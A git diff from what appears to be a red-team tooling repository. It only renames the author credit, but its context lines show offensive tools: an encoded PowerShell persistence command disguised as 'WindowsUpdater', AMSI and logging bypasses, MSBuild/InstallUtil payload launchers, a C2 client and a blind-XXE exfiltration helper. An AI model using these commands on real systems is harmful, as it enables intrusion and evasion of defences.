# <mb [at] binary-offensive.com>
|
# <mb [at] binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
|
@ -37,7 +37,7 @@ PS > py .\gophish-send-mail.py .\send-mail-with-gophish.yaml
|
|||||||
|
|
||||||
:: GoPhish Single Mail Send utility
|
:: GoPhish Single Mail Send utility
|
||||||
Helping you embellish your emails by sending them one-by-one
|
Helping you embellish your emails by sending them one-by-one
|
||||||
Mariusz B. / mgeeky
|
Mariusz Banach / mgeeky
|
||||||
|
|
||||||
[+] Template to use:
|
[+] Template to use:
|
||||||
ID: 22
|
ID: 22
|
||||||
|
@ -165,7 +165,7 @@ def main(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: GoPhish Single Mail Send utility
|
:: GoPhish Single Mail Send utility
|
||||||
Helping you embellish your emails by sending them one-by-one
|
Helping you embellish your emails by sending them one-by-one
|
||||||
Mariusz B. / mgeeky
|
Mariusz Banach / mgeeky
|
||||||
''')
|
''')
|
||||||
|
|
||||||
template = getTemplate()
|
template = getTemplate()
|
||||||
|
@ -205,7 +205,7 @@ def main(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: Phishing HTML Linter
|
:: Phishing HTML Linter
|
||||||
Shows you bad smells in your HTML code that will get your mails busted!
|
Shows you bad smells in your HTML code that will get your mails busted!
|
||||||
Mariusz B. / mgeeky
|
Mariusz Banach / mgeeky
|
||||||
''')
|
''')
|
||||||
|
|
||||||
html = ''
|
html = ''
|
||||||
|
@ -19,7 +19,7 @@
|
|||||||
' WindowsPersistence "powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater"
|
' WindowsPersistence "powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater"
|
||||||
'
|
'
|
||||||
' AUTHOR:
|
' AUTHOR:
|
||||||
' Mariusz B. / mgeeky, '17
|
' Mariusz Banach / mgeeky, '17
|
||||||
'
|
'
|
||||||
|
|
||||||
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
|
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
|
||||||
|
@ -100,7 +100,7 @@ function Bypass-CLM
|
|||||||
Write-Host "`tAppLocker Constrined Language Mode Bypass via COM"
|
Write-Host "`tAppLocker Constrined Language Mode Bypass via COM"
|
||||||
Write-Host "`t(implementation of: @xpn's technique, as documented in:)"
|
Write-Host "`t(implementation of: @xpn's technique, as documented in:)"
|
||||||
Write-Host "`t(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)"
|
Write-Host "`t(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)"
|
||||||
Write-Host "`n`tRe-implemented, enhanced by: Mariusz B., mgeeky"
|
Write-Host "`n`tRe-implemented, enhanced by: Mariusz Banach, mgeeky"
|
||||||
Write-Host "`t-----`n"
|
Write-Host "`t-----`n"
|
||||||
|
|
||||||
Write-Host "[.] Step 0. Planted DLL files in:`n`t$dstAssemblyPath`n`t$dstDllPath"
|
Write-Host "[.] Step 0. Planted DLL files in:`n`t$dstAssemblyPath`n`t$dstDllPath"
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
* This DLL hosts CLR4 environment from within a native binary. This way it is possible to
|
* This DLL hosts CLR4 environment from within a native binary. This way it is possible to
|
||||||
* call .NET APIs from an unmanaged runtime.
|
* call .NET APIs from an unmanaged runtime.
|
||||||
*
|
*
|
||||||
* Mariusz B., mgeeky, 19'
|
* Mariusz Banach, mgeeky, 19'
|
||||||
*
|
*
|
||||||
**/
|
**/
|
||||||
|
|
||||||
|
@ -26,7 +26,7 @@ PS > .\Bypass-CLM.ps1
|
|||||||
(implementation of: @xpn's technique, as documented in:)
|
(implementation of: @xpn's technique, as documented in:)
|
||||||
(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)
|
(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)
|
||||||
|
|
||||||
Re-implemented, enhanced by: Mariusz B., mgeeky
|
Re-implemented, enhanced by: Mariusz Banach, mgeeky
|
||||||
-----
|
-----
|
||||||
|
|
||||||
[.] Step 0. Planted DLL files in:
|
[.] Step 0. Planted DLL files in:
|
||||||
|
@ -22,7 +22,7 @@ The script offers subcommands-kind of CLI interface, so after every command one
|
|||||||
PS> py .\c3-client.py --help
|
PS> py .\c3-client.py --help
|
||||||
|
|
||||||
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
|
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
usage:
|
usage:
|
||||||
Usage: ./c3-client.py [options] <host> <command> [...]
|
Usage: ./c3-client.py [options] <host> <command> [...]
|
||||||
@ -59,7 +59,7 @@ optional arguments:
|
|||||||
PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay --help
|
PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay --help
|
||||||
|
|
||||||
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
|
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
usage: Usage: ./c3-client.py [options] <host> <command> [...] alarm relay [-h] [-e EXECUTE] [-x WEBHOOK] [-g gateway_id]
|
usage: Usage: ./c3-client.py [options] <host> <command> [...] alarm relay [-h] [-e EXECUTE] [-x WEBHOOK] [-g gateway_id]
|
||||||
|
|
||||||
@ -144,7 +144,7 @@ This example shows how to keep all of your Relays pinged every 45 seconds:
|
|||||||
PS D:\> py c3-client.py http://192.168.0.200:52935 ping -k 45
|
PS D:\> py c3-client.py http://192.168.0.200:52935 ping -k 45
|
||||||
|
|
||||||
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
|
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
[.] Sending a ping every 45 seconds.
|
[.] Sending a ping every 45 seconds.
|
||||||
[.] Pinged relay: matter4 from gateway gate4
|
[.] Pinged relay: matter4 from gateway gate4
|
||||||
@ -170,7 +170,7 @@ Ever suffered from a poor C3 bandwidth or general performance? Worry not - you c
|
|||||||
PS D:\> py .\c3-client.py http://192.168.0.200:52935 channel all clear
|
PS D:\> py .\c3-client.py http://192.168.0.200:52935 channel all clear
|
||||||
|
|
||||||
:: C3 Client - a lightweight automated companion with C3 voyages
|
:: C3 Client - a lightweight automated companion with C3 voyages
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
[.] LDAP: Clearing messages queue...
|
[.] LDAP: Clearing messages queue...
|
||||||
[+] Cleared LDAP attribute value on C3 channel 3 on Relay matter4 on gateway gate4
|
[+] Cleared LDAP attribute value on C3 channel 3 on Relay matter4 on gateway gate4
|
||||||
@ -213,7 +213,7 @@ In this example setup an alarm that triggers upon new Relay checking-in. Wheneve
|
|||||||
PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay -g gate4 --execute "powershell -file speak.ps1 -message \`"New C3 Relay Inbound: <domain>/<userName>, computer: <computerName>\`""
|
PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay -g gate4 --execute "powershell -file speak.ps1 -message \`"New C3 Relay Inbound: <domain>/<userName>, computer: <computerName>\`""
|
||||||
|
|
||||||
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
|
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
[.] Entering infinite-loop awaiting for new Relays...
|
[.] Entering infinite-loop awaiting for new Relays...
|
||||||
[+] New Relay checked-in!
|
[+] New Relay checked-in!
|
||||||
@ -325,6 +325,6 @@ py c3-client.py http://192.168.0.200:52935 ping -k 45
|
|||||||
## Author
|
## Author
|
||||||
|
|
||||||
```
|
```
|
||||||
Mariusz B. / mgeeky, '21
|
Mariusz Banach / mgeeky, '21
|
||||||
<mb [at] binary-offensive.com>
|
<mb [at] binary-offensive.com>
|
||||||
```
|
```
|
||||||
|
@ -2036,7 +2036,7 @@ def parseArgs(argv):
|
|||||||
def main(argv):
|
def main(argv):
|
||||||
print('''
|
print('''
|
||||||
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
|
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
''')
|
''')
|
||||||
parseArgs(argv)
|
parseArgs(argv)
|
||||||
|
|
||||||
|
@ -8,7 +8,7 @@
|
|||||||
PS> . .\Count-PrivilegedGroupMembers.ps1
|
PS> . .\Count-PrivilegedGroupMembers.ps1
|
||||||
PS> Count-PrivilegedGroupMembers
|
PS> Count-PrivilegedGroupMembers
|
||||||
|
|
||||||
Mariusz B. / mgeeky
|
Mariusz Banach / mgeeky
|
||||||
#>
|
#>
|
||||||
|
|
||||||
# This script requires PowerView 3.0 dev branch
|
# This script requires PowerView 3.0 dev branch
|
||||||
|
@ -5,7 +5,7 @@
|
|||||||
|
|
||||||
Attempts to disable AMSI within current process using well-known techniques laid out in an unsignatured way.
|
Attempts to disable AMSI within current process using well-known techniques laid out in an unsignatured way.
|
||||||
|
|
||||||
Author: Mariusz B. (@mgeeky)
|
Author: Mariusz Banach (@mgeeky)
|
||||||
License: BSD 3-Clause
|
License: BSD 3-Clause
|
||||||
Required Dependencies: None
|
Required Dependencies: None
|
||||||
Optional Dependencies: None
|
Optional Dependencies: None
|
||||||
|
@ -5,7 +5,7 @@
|
|||||||
|
|
||||||
Attempts to disable Script Block logging within current process using well-known techniques laid out in an unsignatured way.
|
Attempts to disable Script Block logging within current process using well-known techniques laid out in an unsignatured way.
|
||||||
|
|
||||||
Author: Mariusz B. (@mgeeky)
|
Author: Mariusz Banach (@mgeeky)
|
||||||
License: BSD 3-Clause
|
License: BSD 3-Clause
|
||||||
Required Dependencies: None
|
Required Dependencies: None
|
||||||
Optional Dependencies: None
|
Optional Dependencies: None
|
||||||
|
@ -5,7 +5,7 @@
|
|||||||
files for later processing. This script is compatible with newest PowerView's version,
|
files for later processing. This script is compatible with newest PowerView's version,
|
||||||
from dev branch (as of 2018) that uses Get-Domain*, Find-* (instead of Invoke-*) and others cmdlets.
|
from dev branch (as of 2018) that uses Get-Domain*, Find-* (instead of Invoke-*) and others cmdlets.
|
||||||
|
|
||||||
Author: Mariusz B. (mgeeky), '18
|
Author: Mariusz Banach (mgeeky), '18
|
||||||
License: BSD 3-Clause
|
License: BSD 3-Clause
|
||||||
Required Dependencies: PowerSploit's Recon.psm1
|
Required Dependencies: PowerSploit's Recon.psm1
|
||||||
#>
|
#>
|
||||||
|
@ -1,7 +1,7 @@
|
|||||||
#requires -version 2
|
#requires -version 2
|
||||||
|
|
||||||
<#
|
<#
|
||||||
Author: Mariusz B. (@mgeeky)
|
Author: Mariusz Banach (@mgeeky)
|
||||||
License: BSD 3-Clause
|
License: BSD 3-Clause
|
||||||
Required Dependencies: PowerView.ps1
|
Required Dependencies: PowerView.ps1
|
||||||
Optional Dependencies: None
|
Optional Dependencies: None
|
||||||
@ -12,7 +12,7 @@ function Get-DomainOUTree
|
|||||||
<#
|
<#
|
||||||
.SYNOPSIS
|
.SYNOPSIS
|
||||||
|
|
||||||
Author: Mariusz B. (@mgeeky)
|
Author: Mariusz Banach (@mgeeky)
|
||||||
License: BSD 3-Clause
|
License: BSD 3-Clause
|
||||||
Required Dependencies: PowerView.ps1
|
Required Dependencies: PowerView.ps1
|
||||||
Optional Dependencies: None
|
Optional Dependencies: None
|
||||||
@ -65,7 +65,7 @@ function Get-NetOUTree
|
|||||||
<#
|
<#
|
||||||
.SYNOPSIS
|
.SYNOPSIS
|
||||||
|
|
||||||
Author: Mariusz B. (@mgeeky)
|
Author: Mariusz Banach (@mgeeky)
|
||||||
License: BSD 3-Clause
|
License: BSD 3-Clause
|
||||||
Required Dependencies: PowerView.ps1
|
Required Dependencies: PowerView.ps1
|
||||||
Optional Dependencies: None
|
Optional Dependencies: None
|
||||||
|
@ -8,7 +8,7 @@
|
|||||||
PS> . .\Get-UserPasswordEntries.ps1
|
PS> . .\Get-UserPasswordEntries.ps1
|
||||||
PS> Get-UserPasswordEntries
|
PS> Get-UserPasswordEntries
|
||||||
|
|
||||||
Mariusz B. / mgeeky
|
Mariusz Banach / mgeeky
|
||||||
#>
|
#>
|
||||||
|
|
||||||
# This script requires PowerView 3.0 dev branch
|
# This script requires PowerView 3.0 dev branch
|
||||||
|
@ -15,7 +15,7 @@ PS > .\Bypass-CLM.ps1
|
|||||||
(implementation of: @xpn's technique, as documented in:)
|
(implementation of: @xpn's technique, as documented in:)
|
||||||
(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)
|
(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)
|
||||||
|
|
||||||
Re-implemented, enhanced by: Mariusz B., mgeeky
|
Re-implemented, enhanced by: Mariusz Banach, mgeeky
|
||||||
-----
|
-----
|
||||||
|
|
||||||
[.] Step 0. Planted DLL files in:
|
[.] Step 0. Planted DLL files in:
|
||||||
@ -180,7 +180,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox
|
|||||||
|
|
||||||
:: Powershell via MSBuild inline-task XML payload generation script
|
:: Powershell via MSBuild inline-task XML payload generation script
|
||||||
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
|
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
[?] File not recognized as PE/EXE.
|
[?] File not recognized as PE/EXE.
|
||||||
|
|
||||||
@ -189,7 +189,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox
|
|||||||
|
|
||||||
<!-- Based on Casey Smith work, Twitter: @subTee -->
|
<!-- Based on Casey Smith work, Twitter: @subTee -->
|
||||||
<!-- Automatically generated using `generateMSBuildXML.py` utility -->
|
<!-- Automatically generated using `generateMSBuildXML.py` utility -->
|
||||||
<!-- by Mariusz B. / mgeeky <mb@binary-offensive.com> -->
|
<!-- by Mariusz Banach / mgeeky <mb@binary-offensive.com> -->
|
||||||
|
|
||||||
<Target Name="btLDoraXcZV">
|
<Target Name="btLDoraXcZV">
|
||||||
<hwiJYmWvD />
|
<hwiJYmWvD />
|
||||||
@ -237,7 +237,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1
|
|||||||
|
|
||||||
:: Powershell via MSBuild inline-task XML payload generation script
|
:: Powershell via MSBuild inline-task XML payload generation script
|
||||||
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
|
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
[?] File not recognized as PE/EXE.
|
[?] File not recognized as PE/EXE.
|
||||||
|
|
||||||
@ -363,7 +363,7 @@ SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 11 (200)
|
|||||||
PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1
|
PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1
|
||||||
|
|
||||||
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
|
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
|
||||||
Mariusz B. / mgeeky, '19 <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, '19 <mb@binary-offensive.com>
|
||||||
|
|
||||||
[.] Will load script file: '.\Test2.ps1'
|
[.] Will load script file: '.\Test2.ps1'
|
||||||
[+] AMSI Disabled.
|
[+] AMSI Disabled.
|
||||||
@ -395,7 +395,7 @@ This script contains malicious content and has been blocked by your antivirus so
|
|||||||
PS D:\> .\Stracciatella.exe -v
|
PS D:\> .\Stracciatella.exe -v
|
||||||
|
|
||||||
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
|
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
|
||||||
Mariusz B. / mgeeky, '19 <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, '19 <mb@binary-offensive.com>
|
||||||
|
|
||||||
[-] It looks like no script path was given.
|
[-] It looks like no script path was given.
|
||||||
[+] AMSI Disabled.
|
[+] AMSI Disabled.
|
||||||
|
@ -5,7 +5,7 @@
|
|||||||
This script launches many PowerView cmdlets and stores their output
|
This script launches many PowerView cmdlets and stores their output
|
||||||
in Clixml files for later processing.
|
in Clixml files for later processing.
|
||||||
|
|
||||||
Author: Mariusz B. (mgeeky), '18
|
Author: Mariusz Banach (mgeeky), '18
|
||||||
License: BSD 3-Clause
|
License: BSD 3-Clause
|
||||||
Required Dependencies: PowerSploit's Recon.psm1
|
Required Dependencies: PowerSploit's Recon.psm1
|
||||||
#>
|
#>
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
' Example of downloading a binary file from the URL, saving it to the
|
' Example of downloading a binary file from the URL, saving it to the
|
||||||
' local filesystem and then launching.
|
' local filesystem and then launching.
|
||||||
'
|
'
|
||||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
' (https://github.com/mgeeky)
|
' (https://github.com/mgeeky)
|
||||||
'
|
'
|
||||||
|
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
' Example of downloading a binary file from the URL, saving it to the
|
' Example of downloading a binary file from the URL, saving it to the
|
||||||
' local filesystem and then launching.
|
' local filesystem and then launching.
|
||||||
'
|
'
|
||||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
' (https://github.com/mgeeky)
|
' (https://github.com/mgeeky)
|
||||||
'
|
'
|
||||||
|
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
' Example of dropping an embedded, base64 encoded binary file to the disk,
|
' Example of dropping an embedded, base64 encoded binary file to the disk,
|
||||||
' decoding it and then launching.
|
' decoding it and then launching.
|
||||||
'
|
'
|
||||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
' (https://github.com/mgeeky)
|
' (https://github.com/mgeeky)
|
||||||
'
|
'
|
||||||
|
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
' This script uses WMI class' Win32_Process static method Create to
|
' This script uses WMI class' Win32_Process static method Create to
|
||||||
' execute given command in a hidden window (ShowWindow = 12).
|
' execute given command in a hidden window (ShowWindow = 12).
|
||||||
'
|
'
|
||||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
' (https://github.com/mgeeky)
|
' (https://github.com/mgeeky)
|
||||||
'
|
'
|
||||||
|
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
' This script uses classic WScript.Shell Run method to
|
' This script uses classic WScript.Shell Run method to
|
||||||
' execute given command in a hidden window (second param = 0)
|
' execute given command in a hidden window (second param = 0)
|
||||||
'
|
'
|
||||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
' (https://github.com/mgeeky)
|
' (https://github.com/mgeeky)
|
||||||
'
|
'
|
||||||
|
|
||||||
|
@ -3,7 +3,7 @@
|
|||||||
' execute given command in a hidden window via StdIn passed to a dedicated
|
' execute given command in a hidden window via StdIn passed to a dedicated
|
||||||
' launcher command (powershell.exe in this example).
|
' launcher command (powershell.exe in this example).
|
||||||
'
|
'
|
||||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
' (https://github.com/mgeeky)
|
' (https://github.com/mgeeky)
|
||||||
'
|
'
|
||||||
|
|
||||||
|
@ -12,7 +12,7 @@
|
|||||||
# - raw Shellcode in a separate thread via CreateThread
|
# - raw Shellcode in a separate thread via CreateThread
|
||||||
# - .NET Assembly via Assembly.Load
|
# - .NET Assembly via Assembly.Load
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import re
|
import re
|
||||||
@ -479,7 +479,7 @@ def getInlineTask(module, payload, _format, apc, targetProcess):
|
|||||||
|
|
||||||
<!-- Based on Casey Smith work, Twitter: @subTee -->
|
<!-- Based on Casey Smith work, Twitter: @subTee -->
|
||||||
<!-- Automatically generated using `generateMSBuildXML.py` utility -->
|
<!-- Automatically generated using `generateMSBuildXML.py` utility -->
|
||||||
<!-- by Mariusz B. / mgeeky <mb@binary-offensive.com> -->
|
<!-- by Mariusz Banach / mgeeky <mb@binary-offensive.com> -->
|
||||||
|
|
||||||
<Target Name="$taskName">
|
<Target Name="$taskName">
|
||||||
<$templateName />
|
<$templateName />
|
||||||
@ -584,7 +584,7 @@ def main(argv):
|
|||||||
sys.stderr.write('''
|
sys.stderr.write('''
|
||||||
:: Powershell via MSBuild inline-task XML payload generation script
|
:: Powershell via MSBuild inline-task XML payload generation script
|
||||||
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
|
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
''')
|
''')
|
||||||
if len(argv) < 2:
|
if len(argv) < 2:
|
||||||
|
@ -7,7 +7,7 @@
|
|||||||
# script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your
|
# script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your
|
||||||
# future use of BloodHound.
|
# future use of BloodHound.
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky
|
# Mariusz Banach / mgeeky
|
||||||
#
|
#
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
|
@ -3,7 +3,7 @@
|
|||||||
<!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), Twitter: @subTee -->
|
<!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), Twitter: @subTee -->
|
||||||
|
|
||||||
<!-- To be launched like so: cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe task1.xml -->
|
<!-- To be launched like so: cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe task1.xml -->
|
||||||
<!-- Modified by Mariusz B. / mgeeky. -->
|
<!-- Modified by Mariusz Banach / mgeeky. -->
|
||||||
|
|
||||||
<Target Name="MyLittleInlineTaskName">
|
<Target Name="MyLittleInlineTaskName">
|
||||||
<MyLittleInlineTask />
|
<MyLittleInlineTask />
|
||||||
|
@ -23,7 +23,7 @@ python3 generateRogueDotNet.py --help
|
|||||||
|
|
||||||
:: Rogue .NET Source Code Generation Utility
|
:: Rogue .NET Source Code Generation Utility
|
||||||
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
usage: .\generateRogueDotNet.py [options] <inputFile>
|
usage: .\generateRogueDotNet.py [options] <inputFile>
|
||||||
|
|
||||||
@ -43,7 +43,7 @@ python3 generateRogueDotNet.py -r notepad64.bin > program.cs
|
|||||||
|
|
||||||
:: Rogue .NET Source Code Generation Utility
|
:: Rogue .NET Source Code Generation Utility
|
||||||
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
[?] File specified as raw Shellcode.
|
[?] File specified as raw Shellcode.
|
||||||
|
|
||||||
|
@ -34,7 +34,7 @@
|
|||||||
# cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import re
|
import re
|
||||||
@ -519,7 +519,7 @@ def getSourceFileContents(
|
|||||||
|
|
||||||
/*
|
/*
|
||||||
Author: Casey Smith, Twitter: @subTee
|
Author: Casey Smith, Twitter: @subTee
|
||||||
Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Customized by: Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
License: BSD 3-Clause
|
License: BSD 3-Clause
|
||||||
|
|
||||||
Step 1: Create Your Strong Name Key -> key.snk
|
Step 1: Create Your Strong Name Key -> key.snk
|
||||||
@ -806,7 +806,7 @@ def main(argv):
|
|||||||
sys.stderr.write('''
|
sys.stderr.write('''
|
||||||
:: Rogue .NET Source Code Generation Utility
|
:: Rogue .NET Source Code Generation Utility
|
||||||
Comes with a few hardcoded C# code templates and an easy wrapper around csc.exe compiler
|
Comes with a few hardcoded C# code templates and an easy wrapper around csc.exe compiler
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
''')
|
''')
|
||||||
if len(argv) < 2:
|
if len(argv) < 2:
|
||||||
|
@ -31,7 +31,7 @@
|
|||||||
# mysql:x:101:65534:Linux User,,,:/home/mysql:/bin/false
|
# mysql:x:101:65534:Linux User,,,:/home/mysql:/bin/false
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
# Mariusz B., 2016
|
# Mariusz Banach, 2016
|
||||||
#
|
#
|
||||||
|
|
||||||
|
|
||||||
@ -132,7 +132,7 @@ def parseOptions(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: Blind-XXE attacker's helper backend component
|
:: Blind-XXE attacker's helper backend component
|
||||||
Helps exfiltrate files by abusing out-of-bands XML External Entity vulnerabilities.
|
Helps exfiltrate files by abusing out-of-bands XML External Entity vulnerabilities.
|
||||||
Mariusz B. / mgeeky '16-18, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '16-18, <mb@binary-offensive.com>
|
||||||
''')
|
''')
|
||||||
|
|
||||||
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <file>')
|
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <file>')
|
||||||
|
@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/python
|
#!/usr/bin/python
|
||||||
#
|
#
|
||||||
# Padding Oracle test-cases generator.
|
# Padding Oracle test-cases generator.
|
||||||
# Mariusz B. / mgeeky, 2016
|
# Mariusz Banach / mgeeky, 2016
|
||||||
# v0.2
|
# v0.2
|
||||||
#
|
#
|
||||||
# Simple utility that aids the penetration tester when manually testing Padding Oracle condition
|
# Simple utility that aids the penetration tester when manually testing Padding Oracle condition
|
||||||
@ -277,7 +277,7 @@ def hex_dump(data):
|
|||||||
|
|
||||||
def main():
|
def main():
|
||||||
info('\n\tPadding Oracle test-cases generator')
|
info('\n\tPadding Oracle test-cases generator')
|
||||||
info('\tMariusz B. / mgeeky, 2016\n')
|
info('\tMariusz Banach / mgeeky, 2016\n')
|
||||||
|
|
||||||
if len(sys.argv) < 2:
|
if len(sys.argv) < 2:
|
||||||
warning('usage: padding-oracle-tests.py <data> [blocksize]')
|
warning('usage: padding-oracle-tests.py <data> [blocksize]')
|
||||||
|
@ -14,7 +14,7 @@
|
|||||||
* to add forced redirection to the target site.
|
* to add forced redirection to the target site.
|
||||||
*
|
*
|
||||||
* Authors:
|
* Authors:
|
||||||
* Mariusz B. / mgeeky
|
* Mariusz Banach / mgeeky
|
||||||
